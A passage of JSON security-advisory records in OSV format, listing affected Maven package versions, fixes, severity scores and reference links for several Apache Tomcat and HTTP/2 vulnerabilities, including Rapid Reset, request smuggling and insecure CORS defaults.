"WEB", "url": "https://www.debian.org/security/2023/dsa-5570" }, { "type": "WEB", "url": "https://www.eclipse.org/lists/jetty-announce/msg00181.html" }, { "type": "WEB", "url": "https://www.haproxy.com/blog/haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487" }, { "type": "WEB", "url": "https://www.netlify.com/blog/netlify-successfully-mitigates-cve-2023-44487" }, { "type": "WEB", "url": "https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products" }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2023/10/10/6" }, { "type": "WEB", "url": "https://www.phoronix.com/news/HTTP2-Rapid-Reset-Attack" }, { "type": "WEB", "url": "https://www.theregister.com/2023/10/10/http2_rapid_reset_zeroday" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/rapid-reset-cve-2023-44487-dos-in-http2-understanding-the-root-cause" }, { "type": "WEB", "url": "https://news.ycombinator.com/item?id=37830987" }, { "type": "WEB", "url": "https://news.ycombinator.com/item?id=37830998" }, { "type": "WEB", "url": "https://news.ycombinator.com/item?id=37831062" }, { "type": "WEB", "url": "https://news.ycombinator.com/item?id=37837043" }, { "type": "WEB", "url": "https://openssf.org/blog/2023/10/10/http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response" }, { "type": "WEB", "url": "https://seanmonstar.com/post/730794151136935936/hyper-http2-rapid-reset-unaffected" }, { "type": "WEB", "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-http2-reset-d8Kf32vZ" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-09" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231016-0001" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240426-0007" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0007" }, { "type": "WEB", "url": "https://security.paloaltonetworks.com/CVE-2023-44487" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.14" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.0-M12" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.94" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.81" }, { "type": "WEB", "url": "https://ubuntu.com/security/CVE-2023-44487" }, { "type": "WEB", "url": "https://edg.io/lp/blog/resets-leaks-ddos-and-the-tale-of-a-hidden-cve" }, { "type": "WEB", "url": "https://forums.swift.org/t/swift-nio-http2-security-update-cve-2023-44487-http-2-dos/67764" }, { "type": "WEB", "url": "https://gist.github.com/adulau/7c2bfb8e9cdbe4b35a5e131c66a0c088" }, { "type": "WEB", "url": "https://github.com/Kong/kong/discussions/11741" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-qppj-fm5r-hxr3" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-vx74-f528-fxqg" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-xpw8-rcwv-8f8p" }, { "type": "WEB", "url": "https://github.com/apache/httpd/blob/afcdbeebbff4b0c50ea26cdd16e178c0d1f24152/modules/http2/h2_mplx.c#L1101-L1113" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/tree/main/java/org/apache/coyote/http2" }, { "type": "PACKAGE", "url": "https://github.com/apple/swift-nio-http2" }, { "type": "WEB", "url": "https://github.com/arkrwn/PoC/tree/main/CVE-2023-44487" }, { "type": "WEB", "url": "https://github.com/bcdannyboy/CVE-2023-44487" }, { "type": "WEB", "url": "https://github.com/caddyserver/caddy/releases/tag/v2.7.5" }, { "type": "WEB", "url": "https://github.com/dotnet/core/blob/e4613450ea0da7fd2fc6b61dfb2c1c1dec1ce9ec/release-notes/6.0/6.0.23/6.0.23.md?plain=1#L73" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-go/releases" }, { "type": "WEB", "url": "https://github.com/grpc/grpc/releases/tag/v1.59.2" }, { "type": "WEB", "url": "https://github.com/icing/mod_h2/blob/0a864782af0a942aa2ad4ed960a6b32cd35bcf0a/mod_http2/README.md?plain=1#L239-L244" }, { "type": "WEB", "url": "https://akka.io/security/akka-http-cve-2023-44487.html" }, { "type": "WEB", "url": "https://arstechnica.com/security/2023/10/how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size" }, { "type": "WEB", "url": "https://aws.amazon.com/security/security-bulletins/AWS-2023-011" }, { "type": "WEB", "url": "https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack" }, { "type": "WEB", "url": "https://blog.cloudflare.com/zero-day-rapid-reset-http2-record-breaking-ddos-attack" }, { "type": "WEB", "url": "https://blog.litespeedtech.com/2023/10/11/rapid-reset-http-2-vulnerablilty" }, { "type": "WEB", "url": "https://blog.qualys.com/vulnerabilities-threat-research/2023/10/10/cve-2023-44487-http-2-rapid-reset-attack" }, { "type": "WEB", "url": "https://blog.vespa.ai/cve-2023-44487" }, { "type": "WEB", "url": "https://bugzilla.proxmox.com/show_bug.cgi?id=4988" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242803" }, { "type": "WEB", "url": "https://bugzilla.suse.com/show_bug.cgi?id=1216123" }, { "type": "WEB", "url": "https://cgit.freebsd.org/ports/commit/?id=c64c329c2c1752f46b73e3e6ce9f4329be6629f9" }, { "type": "WEB", "url": "https://chaos.social/@icing/111210915918780532" }, { "type": "WEB", "url": "https://cloud.google.com/blog/products/identity-security/google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps" }, { "type": "WEB", "url": "https://cloud.google.com/blog/products/identity-security/how-it-works-the-novel-http2-rapid-reset-ddos-attack" }, { "type": "WEB", "url": "https://community.traefik.io/t/is-traefik-vulnerable-to-cve-2023-44487/20125" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2023-32-vault-consul-and-boundary-affected-by-http-2-rapid-reset-denial-of-service-vulnerability-cve-2023-44487/59715" }, { "type": "WEB", "url": "https://github.com/micrictor/http2-rst-stream" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2MBEPPC36UBVOZZNAXFHKLFGSLCMN5LI" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BFQD3KUEMFBHPAPBGLWQC34L4OWL5HAZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CLB4TW7KALB3EEQWNWCN7OUIWWVWWCG2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JIZSEFC3YKCGABA2BZW6ZJRMDZJMB7PJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JMEXY22BFG5Q64HQCM5CK2Q7KDKVV4TY" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSEGD2IWKNUO3DWY4KQGUQM5BISRWHQE" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LNMZJCDHGLJJLXO4OXWJMTVQRNWOC7UL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VHUHTSXLXGXS7JYKBXTA3VINUPHTNGVU" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VSRDIV77HNKUSM7SJC5BKE5JSHLHU2NK" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WE2I52RHNNU42PX6NZ2RBUHSFFJ2LVZX" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WLPRQ5TWUQQXYWBJM7ECYDAIL2YVKIUH" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y" }, { "type": "WEB", "url": "https://github.com/nghttp2/nghttp2/releases/tag/v1.57.0" }, { "type": "WEB", "url": "https://github.com/oqtane/oqtane.framework/discussions/3367" }, { "type": "WEB", "url": "https://go.dev/cl/534215" }, { "type": "WEB", "url": "https://go.dev/cl/534235" }, { "type": "WEB", "url": "https://go.dev/issue/63417" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo/m/UDd7VKQuAAAJ" }, { "type": "WEB", "url": "https://istio.io/latest/news/security/istio-security-2023-004" }, { "type": "WEB", "url": "https://linkerd.io/2023/10/12/linkerd-cve-2023-44487" }, { "type": "WEB", "url": "https://lists.apache.org/thread/5py8h42mxfsn8l1wy6o41xwhsjlsd87q" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00023.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00024.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00045.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00047.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00001.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00012.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/10/6" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/10/7" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/13/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/13/9" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/18/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/18/8" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/19/6" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/20/8" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-10-10T21:28:24Z", "nvd_published_at": "2023-10-10T14:15:10Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:A" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qvf5-hvjx-wm27", "published": "2024-11-18T12:30:43Z", "modified": "2025-01-24T22:02:57.022869Z", "aliases": [ "BIT-tomcat-2024-52317", "CVE-2024-52317" ], "summary": "Apache Tomcat Request and/or response mix-up", "details": "Incorrect object re-cycling and re-use vulnerability in Apache Tomcat. Incorrect recycling of the request and response used by HTTP/2 requests could lead to request and/or response mix-up between users.\n\nThis issue affects Apache Tomcat: from 11.0.0-M23 through 11.0.0-M26, from 10.1.27 through 10.1.30, from 9.0.92 through 9.0.95.\n\nUsers are recommended to upgrade to version 11.0.0, 10.1.31 or 9.0.96, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.92" }, { "fixed": "9.0.96" } ] } ], "versions": [ "9.0.93", "9.0.94", "9.0.95" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qvf5-hvjx-wm27/GHSA-qvf5-hvjx-wm27.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.92" }, { "fixed": "9.0.96" } ] } ], "versions": [ "9.0.93", "9.0.94", "9.0.95" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qvf5-hvjx-wm27/GHSA-qvf5-hvjx-wm27.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.27" }, { "fixed": "10.1.31" } ] } ], "versions": [ "10.1.28", "10.1.29", "10.1.30" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qvf5-hvjx-wm27/GHSA-qvf5-hvjx-wm27.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M23" }, { "fixed": "11.0.0" } ] } ], "versions": [ "11.0.0-M24", "11.0.0-M25", "11.0.0-M26" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qvf5-hvjx-wm27/GHSA-qvf5-hvjx-wm27.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.27" }, { "fixed": "10.1.31" } ] } ], "versions": [ "10.1.28", "10.1.29", "10.1.30" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qvf5-hvjx-wm27/GHSA-qvf5-hvjx-wm27.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M23" }, { "fixed": "11.0.0" } ] } ], "versions": [ "11.0.0-M24", "11.0.0-M25", "11.0.0-M26" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qvf5-hvjx-wm27/GHSA-qvf5-hvjx-wm27.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52317" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/146f94f87ea398fb592c7a20a5ccbef95e9dd72b" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/47307ee27abcdea2ee40e33897aca760083de46a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/9e840ccacb40881c03a03b1e0746bfba7369b3bd" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/ty376mrxy1mmxtw3ogo53nc9l3co3dfs" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250124-0004" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/11/18/3" } ], "database_specific": { "cwe_ids": [ "CWE-326" ], "github_reviewed": true, "github_reviewed_at": "2024-11-18T21:03:05Z", "nvd_published_at": "2024-11-18T12:15:18Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qxf4-chvg-4r8r", "published": "2020-02-28T01:10:48Z", "modified": "2024-03-14T05:17:09.684982Z", "aliases": [ "BIT-tomcat-2020-1935", "CVE-2020-1935" ], "related": [ "CGA-m48x-5w5p-h4vm" ], "summary": "Potential HTTP request smuggling in Apache Tomcat", "details": "In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "7.0.100" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96", "7.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-qxf4-chvg-4r8r/GHSA-qxf4-chvg-4r8r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.51" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-qxf4-chvg-4r8r/GHSA-qxf4-chvg-4r8r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.31" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-qxf4-chvg-4r8r/GHSA-qxf4-chvg-4r8r.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "7.0.100" } ] } ], "versions": [ "7.0.35", "7.0.37", "7.0.39", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96", "7.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-qxf4-chvg-4r8r/GHSA-qxf4-chvg-4r8r.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.51" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-qxf4-chvg-4r8r/GHSA-qxf4-chvg-4r8r.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.31" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-qxf4-chvg-4r8r/GHSA-qxf4-chvg-4r8r.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1935" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4680" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4673" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4448-1" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200327-0005" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd547be0c9d821b4b1000a694b8e58ef9f5e2d66db03a31dfe77c4b18@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc31cbabb46cdc58bbdd8519a8f64b6236b2635a3922bbeba0f0e3743@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra5dee390ad2d60307b8362505c059cd6a726de4d146d63dfce1e05e7@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ce7918faf347e7aac32be930bf26c233b0b140fe37af0bb294158b6@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r80e9c8417c77d52c62809168b96912bda70ddf7748f19f8210f745b1@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7bc994c965a34876bd94d5ff15b4e1e30b6220a15eb9b47c81915b78@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r660cd379afe346f10d72c0eaa8459ccc95d83aff181671b7e9076919@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r441c1f30a252bf14b07396286f6abd8089ce4240e91323211f1a2d75@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r127f76181aceffea2bd4711b03c595d0f115f63e020348fe925a916c%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-02-25T16:18:59Z", "nvd_published_at": "2020-02-24T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r4x2-3cq5-hqvp", "published": "2018-10-17T16:32:32Z", "modified": "2024-03-12T05:32:05.310460Z", "aliases": [ "CVE-2018-8014" ], "summary": "The defaults settings for the CORS filter provided in Apache Tomcat are insecure and enable 'supportsCredentials' for all origins", "details": "The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.9" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.8", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r4x2-3cq5-hqvp/GHSA-r4x2-3cq5-hqvp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.32" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.4", "8.5.5", 